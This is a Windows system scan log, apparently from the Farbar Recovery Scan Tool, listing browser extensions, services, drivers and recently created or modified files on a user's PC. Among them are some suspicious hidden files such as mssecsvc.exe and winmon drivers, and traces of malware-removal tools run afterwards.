CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile [2019-02-15]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AgereModemAudio; C:\Program Files\LSI SoftModem\agr64svc.exe [42096 2015-08-05] (Avago Technologies U.S. Inc. -> LSI Corporation)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
S3 aspnet_state; C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [32768 2004-07-15] (Microsoft Corporation) [File not signed]
R3 BlackBerry Device Manager; C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe [588024 2014-10-31] (BlackBerry Ltd. -> BlackBerry Limited)
S3 CommuniGate Pro Messaging Server; C:\Windows\CommuniGatePro\CGStarter.exe [38552 2017-02-14] (CommuniGate Systems -> )
R2 hpHotkeyMonitor; C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\hpHotkeyMonitor.exe [684624 2015-06-23] (Hewlett-Packard -> Hewlett-Packard Company)
S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (Hewlett-Packard Company -> HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [347512 2018-12-06] (HP Inc. -> HP Inc.)
R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-04-19] (Hewlett-Packard Company -> HP Inc.)
R2 IsAppService; C:\Program Files (x86)\Iskysoft\IAF\2.4.2.223\IsAppService.exe [473352 2017-03-30] (Shenzhen Yi Xing Investment Co., Ltd. -> Iskysoft)
R3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
R2 OpenVPNService; C:\Program Files\OpenVPN\bin\openvpnserv2.exe [24192 2018-03-06] (OpenVPN Technologies, Inc. ->  )
R2 OpenVPNServiceInteractive; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S2 OpenVPNServiceLegacy; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R2 RIM MDNS; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe [396024 2015-05-26] (BlackBerry Ltd. -> Apple Inc.)
R2 RIM Tunnel Service; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe [1355000 2015-05-26] (BlackBerry Ltd. -> BlackBerry Limited)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246872 2017-11-17] (Synaptics Incorporated -> Synaptics Incorporated)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6889232 2015-12-14] (TeamViewer -> TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 Accelerometer; C:\Windows\system32\DRIVERS\Accelerometer.sys [43840 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company)
R3 AgereSoftModem; C:\Windows\system32\DRIVERS\agrsm64.sys [1230104 2015-08-05] (Microsoft Windows Hardware Compatibility Publisher -> LSI Corporation)
S3 androidusb; C:\Windows\System32\Drivers\wsadb.sys [38008 2017-11-10] (Anvsoft Inc. -> Google Inc)
S3 blackberryncm; C:\Windows\system32\DRIVERS\blackberryncm6_AMD64.sys [25600 2015-01-23] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 btwavdt; C:\Windows\system32\DRIVERS\btwavdt.sys [230656 2015-03-13] (Broadcom Corporation -> Broadcom Corporation.)
S3 BTWUSB; C:\Windows\System32\Drivers\btwusb.sys [66136 2015-11-25] (Broadcom Corporation -> Broadcom Corporation.)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 e1cexpress; C:\Windows\system32\DRIVERS\e1c64x64.sys [468752 2014-07-29] (Intel Corporation -> Intel Corporation)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153328 2019-01-08] (Malwarebytes Corporation -> Malwarebytes)
R0 hpdskflt; C:\Windows\System32\DRIVERS\hpdskflt.sys [31040 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company)
S3 hwdatacard; C:\Windows\system32\DRIVERS\ewusbmdm.sys [116864 2009-06-03] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [127136 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [72864 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [274416 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\DRIVERS\mwac.sys [114040 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
S3 Netaapl; C:\Windows\system32\DRIVERS\netaapl64.sys [23040 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.)
R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3349984 2014-03-08] (Intel Corporation-Mobile Wireless Group -> Intel Corporation)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [80384 2015-01-14] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 rimvndis; C:\Windows\System32\Drivers\rimvndis6_AMD64.sys [18432 2015-05-26] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 RimVSerPort; C:\Windows\system32\DRIVERS\RimSerial_AMD64.sys [44544 2012-12-10] (Microsoft Windows Hardware Compatibility Publisher -> Research in Motion Ltd)
R3 SPUVCbv; C:\Windows\System32\Drivers\SPUVCbv64.sys [749824 2017-11-27] (Sunplus Innovation Technology Inc. -> Sunplus Innovation Technology Inc.)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-02-16 09:55 - 2019-02-16 09:55 - 000072864 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-02-16 09:54 - 2019-02-16 09:54 - 000274416 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-02-16 09:54 - 2019-02-16 09:54 - 000127136 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-02-16 09:54 - 2019-02-16 09:54 - 000114040 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-02-16 07:59 - 2019-02-16 07:59 - 000002719 _____ C:\Users\Stanley\Desktop\JRT.txt
2019-02-16 07:45 - 2019-02-16 07:53 - 000001638 _____ C:\Users\Stanley\Desktop\Rkill.txt
2019-02-16 07:45 - 2019-02-16 07:45 - 000000000 ____D C:\Users\Stanley\Desktop\rkill
2019-02-16 07:38 - 2019-02-16 07:44 - 000696026 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.38.18_log.txt
2019-02-16 07:35 - 2019-02-16 07:36 - 000004670 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.35.18_log.txt
2019-02-16 07:31 - 2019-02-16 07:31 - 000004416 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.31.06_log.txt
2019-02-16 07:23 - 2019-02-16 07:26 - 000000000 ____D C:\AdwCleaner
2019-02-15 02:09 - 2019-02-15 02:10 - 000002383 _____ C:\Users\Stanley\Desktop\Chrome Plus - Chrome.lnk
2019-02-15 02:09 - 2019-02-15 02:09 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP 2 - Chrome.lnk
2019-02-15 02:09 - 2019-02-15 02:09 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP - Chrome.lnk
2019-02-15 02:08 - 2019-02-15 02:08 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP 3 - Chrome.lnk
2019-02-15 00:32 - 2019-02-15 00:32 - 000000000 ____D C:\Users\Stanley\AppData\Local\mbam
2019-02-15 00:31 - 2019-02-15 00:31 - 000001883 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-02-15 00:31 - 2019-02-15 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\mbamtray
2019-02-15 00:30 - 2019-02-15 00:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-02-15 00:30 - 2019-02-15 00:30 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-02-15 00:30 - 2019-02-15 00:30 - 000000000 ____D C:\Program Files\Malwarebytes
2019-02-15 00:30 - 2019-01-08 15:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-02-14 02:41 - 2019-02-16 09:02 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\uTorrent
2019-02-13 22:08 - 2019-02-14 02:40 - 000000414 _____ C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job
2019-02-13 22:08 - 2019-02-13 22:08 - 000003256 _____ C:\Windows\System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\taskshostservices.exe
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\WinmonProcessMonitor.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\winmonfs.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\winmon.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\system32\taskshostservices.exe
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\mssecsvc.exe
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SysWOW64\SecureBootThemes
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\system32\SecureBootThemes
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SpeechsTracing
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SecureBootThemes
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\AppDiagnostics
2019-02-12 18:32 - 2019-02-13 14:18 - 000000000 ____D C:\Program Files (x86)\SMADAV
2019-02-12 18:32 - 2019-02-13 05:55 - 000000000 __SHD C:\[Smad-Cage]
2019-02-12 18:32 - 2019-02-12 18:32 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Smadav
2019-02-12 18:31 - 2019-02-12 18:31 - 001698648 _____ (Smadsoft ) C:\Users\Stanley\Downloads\smadav2019rev126.exe
2019-02-12 18:05 - 2019-02-12 18:06 - 064531912 _____ (Malwarebytes ) C:\Users\Stanley\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9208.exe
2019-02-12 17:43 - 2019-02-16 09:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UC Browser
2019-02-12 05:59 - 2019-02-12 05:59 - 000104160 _____ C:\Users\Stanley\Downloads\Shortcut.txt
2019-02-12 05:53 - 2019-02-18 01:25 - 000000000 ____D C:\Users\Stanley\Downloads\FRST
2019-02-12 05:33 - 2019-02-18 01:24 - 000000000 ____D C:\FRST
2019-02-10 21:40 - 2019-02-10 21:40 - 000001483 _____ C:\Users\Stanley\Desktop\iexplore.exe - Shortcut.lnk
2019-02-10 07:29 - 2019-02-10 07:34 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-500
2019-02-10 07:28 - 2019-02-10 07:28 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Hewlett-Packard
2019-02-10 07:25 - 2019-02-10 20:12 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Apple Computer
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Hewlett-Packard
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\OpenVPN
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Apple Computer
2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Packages
2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator
2019-02-10 07:24 - 2019-02-10 07:24 - 000001442 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-02-10 07:24 - 2019-02-10 07:24 - 000000020 ___SH C:\Users\Administrator\ntuser.ini
2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Adobe
2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Local\Google
2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2019-02-09 02:21 - 2019-02-09 02:21 - 000000000 ____D C:\Windows\pss
2019-02-09 01:24 - 2019-02-09 01:24 - 000000146 _____ C:\Users\Stanley\Desktop\Windows Defender - Shortcut.lnk
2019-02-08 22:53 - 2019-02-08 22:56 - 007406936 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-02-08 22:53 - 2019-02-08 22:56 - 001536112 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2019-02-08 22:53 - 2019-02-08 22:53 - 000000000 ____D C:\Users\#Strazzo.RoseGold##
2019-02-07 05:47 - 2019-02-07 05:47 - 000001178 _____ C:\Users\Public\Desktop\PhoneRescue.lnk
2019-02-07 05:40 - 2019-02-07 08:03 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Decipher Media
2019-02-07 05:25 - 2019-02-07 05:36 - 045726776 _____ (Decipher Media) C:\Users\Stanley\Downloads\DecipherBackupRepair.exe
2019-02-07 04:32 - 2019-02-07 04:39 - 040754877 _____ (iMacTools ) C:\Users\Stanley\Downloads\iBackupViewerSetup.exe
2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\iBackup Viewer
2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\CrashRpt
2019-02-07 03:11 - 2019-02-07 03:11 - 000000000 ____D C:\Users\Stanley\Documents\Apowersoft
2019-02-07 03:10 - 2019-02-07 03:10 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apowersoft
2019-02-07 02:04 - 2019-02-07 02:04 - 000000000 ____D C:\Users\Stanley\AppData\Local\Reincubate Temporary Files
2019-02-06 20:03 - 2019-02-06 20:06 - 006258864 _____ (iMobie Inc. ) C:\Users\Stanley\Downloads\phonebrowse-64-setup.exe
2019-02-06 19:48 - 2019-02-06 19:54 - 021424360 _____ (Reincubate Ltd) C:\Users\Stanley\Downloads\iphonebackupextractor-latest.exe
2019-02-06 05:53 - 2019-02-15 01:38 - 000000000 ____D C:\Users\Stanley\Downloads\MM_VideoDownload
2019-02-06 05:53 - 2019-02-06 05:53 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobiMoverUI
2019-02-06 05:30 - 2019-02-06 05:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\SystemAcCrux
2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\WindSolutions
2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\ProgramData\WindSolutions
2019-02-06 04:46 - 2019-02-06 04:46 - 000000000 ____D C:\Users\Stanley\AppData\Local\FoneDog
2019-02-06 04:26 - 2019-02-06 04:27 - 008046792 _____ (WindSolutions) C:\Users\Stanley\Downloads\Install_CopyTransControlCenter.exe
2019-02-06 04:23 - 2019-02-06 04:23 - 000000000 ____D C:\Users\Stanley\AppData\Local\Aiseesoft Studio
2019-02-05 11:35 - 2019-02-06 04:26 - 030804013 _____ (FoneDog ) C:\Users\Stanley\Downloads\fonedog-ios-toolkit.exe
2019-02-05 11:35 - 2019-02-05 11:35 - 000001133 _____ C:\Users\Stanley\Desktop\Syncios.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000002343 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios Data Recovery.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000002331 _____ C:\Users\Public\Desktop\Syncios Data Recovery.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios
2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\Program Files (x86)\Syncios Data Recovery
2019-02-05 01:46 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple Computer
2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\Documents\Wondershare
2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobileBackupForeverIni
2019-02-05 00:50 - 2019-02-05 00:50 - 000000000 ____D C:\Users\Stanley\AppData\Local\AdvinstAnalytics
2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ C:\Users\Stanley\AppData\Local\installer.dat
2019-02-05 00:31 - 2019-02-05 01:39 - 000000000 ____D C:\Users\Stanley\AppData\Local\Deployment
2019-02-05 00:31 - 2019-02-05 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\Apps\2.0
2019-02-04 23:57 - 2019-02-04 23:57 - 000000000 ____D C:\Users\Stanley\AppData\Local\DigiDNA
2019-02-04 23:54 - 2019-02-05 00:05 - 112497792 _____ C:\Users\Stanley\Downloads\setup_syncios (1).exe
2019-02-04 22:32 - 2019-02-04 22:32 - 000000000 ____D C:\Users\RoseGold\Documents\Syncios
2019-02-02 10:43 - 2019-02-02 10:43 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple
2019-01-31 12:39 - 2019-01-31 12:39 - 000048210 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-23 at 1.56.07 PM.jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM.jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM (1).jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000046824 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-20 at 8.50.51 PM.jpeg
2019-01-31 10:17 - 2019-01-31 10:17 - 000046880 _____ C:\Users\Stanley\Downloads\usd slip1.jpeg
2019-01-30 07:56 - 2019-02-10 07:34 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1004
2019-01-30 07:52 - 2019-01-31 06:21 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\hpqlog
2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios
2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Apple Computer
2019-01-30 07:51 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\.android
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios Data Transfer
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\SyncDroid
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Research In Motion
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\BlackBerry
2019-01-30 07:48 - 2019-02-12 06:38 - 000001446 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-01-30 07:48 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Packages
2019-01-30 07:48 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold
2019-01-30 07:48 - 2019-01-30 07:48 - 000000020 ___SH C:\Users\RoseGold\ntuser.ini
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Adobe
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\VirtualStore
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Google
2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2019-01-27 09:06 - 2019-01-27 09:06 - 000202698 _____ C:\Users\Stanley\Downloads\114328 (1).pdf
2019-01-27 08:22 - 2019-01-27 08:22 - 000202698 _____ C:\Users\Stanley\Downloads\114328.pdf
2019-01-26 22:39 - 2019-01-26 22:39 - 000001160 _____ C:\Users\Stanley\Downloads\converted_1082592538.txt
2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ___HD C:\OneDriveTemp
2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ____D C:\Users\Stanley\OneDrive
2019-01-26 14:55 - 2019-01-26 14:55 - 000075241 _____ C:\Users\Stanley\Downloads\newocr.com-20190126135542.pdf
2019-01-26 14:01 - 2019-01-26 14:01 - 000351579 _____ C:\Users\Stanley\Downloads\001 (2).pdf
2019-01-26 13:59 - 2019-01-26 13:59 - 000315587 _____ C:\Users\Stanley\Downloads\001 (1).pdf
2019-01-26 13:53 - 2019-01-26 13:53 - 000271265 _____ C:\Users\Stanley\Downloads\topdf.zip
2019-01-26 13:53 - 2019-01-26 13:52 - 000315587 _____ C:\Users\Stanley\Downloads\001.pdf
2019-01-26 06:02 - 2019-01-26 06:02 - 000001759 _____ C:\Users\Public\Desktop\iTunes.lnk
2019-01-26 06:02 - 2019-01-26 06:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2019-01-26 06:01 - 2019-01-26 06:01 - 000000000 ____D C:\Program Files\iPod
2019-01-26 06:00 - 2019-01-26 06:02 - 000000000 ____D C:\Program Files\iTunes
2019-01-26 05:48 - 2019-01-26 05:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2019-01-22 12:20 - 2019-01-22 12:21 - 000860720 _____ C:\Users\Stanley\Downloads\Ηλεκτρολογικός εξοπλισμός.2016714105916.xlsx
2019-01-21 12:46 - 2019-01-21 12:46 - 003864349 _____ C:\Users\Stanley\Downloads\GPP002-Schneider-Ersatzteile (1).xlsx
2019-01-21 09:17 - 2019-01-21 09:17 - 000215164 _____ C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI222.srt
2019-01-21 02:12 - 2018-12-14 15:23 - 000107584 ____N C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI.srt
2019-01-21 02:09 - 2019-01-21 09:18 - 000039742 _____ C:\Users\Stanley\Downloads\hunter_killer_english_1340435.zip
2019-01-19 16:06 - 2019-02-10 22:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Monopoly Here & Now Edition
2019-01-19 16:06 - 2019-01-19 16:06 - 000000000 ____D C:\ProgramData\TEMP
2019-01-19 16:02 - 2019-01-19 16:03 - 015141368 _____ C:\Users\Stanley\Downloads\MonopolyHNSetup.exe

==================== One month (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-02-18 01:27 - 2018-05-12 16:21 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\uTorrent
2019-02-18 01:21 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf
2019-02-17 07:59 - 2018-06-03 09:29 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\vlc
2019-02-16 10:34 - 2018-05-03 17:58 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1001
2019-02-16 09:05 - 2014-11-22 04:09 - 000176404 _____ C:\Windows\system32\PerfStringBackup.INI
2019-02-16 09:02 - 2018-12-27 19:56 - 000000000 ___RD C:\Users\Stanley\iCloudDrive
2019-02-16 09:00 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-02-16 08:59 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DMCache
2019-02-16 07:54 - 2018-05-12 16:22 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Lavasoft
2019-02-16 07:54 - 2018-05-12 16:21 - 000000000 ____D C:\ProgramData\Lavasoft
2019-02-16 07:54 - 2018-05-12 16:21 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2019-02-16 07:32 - 2013-08-22 14:25 - 000524288 ___SH C:\Windows\system32\config\BBI
2019-02-16 06:09 - 2018-05-09 14:30 - 000507392 ___SH C:\Users\Stanley\Downloads\Thumbs.db
2019-02-16 05:57 - 2018-05-04 17:06 - 000003842 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1525449700
2019-02-16 05:57 - 2018-05-04 17:01 - 000001050 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk
2019-02-16 05:57 - 2018-05-04 17:00 - 000000000 ____D C:\Program Files\Opera
2019-02-15 01:31 - 2018-05-04 07:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DriverPack Easy Search
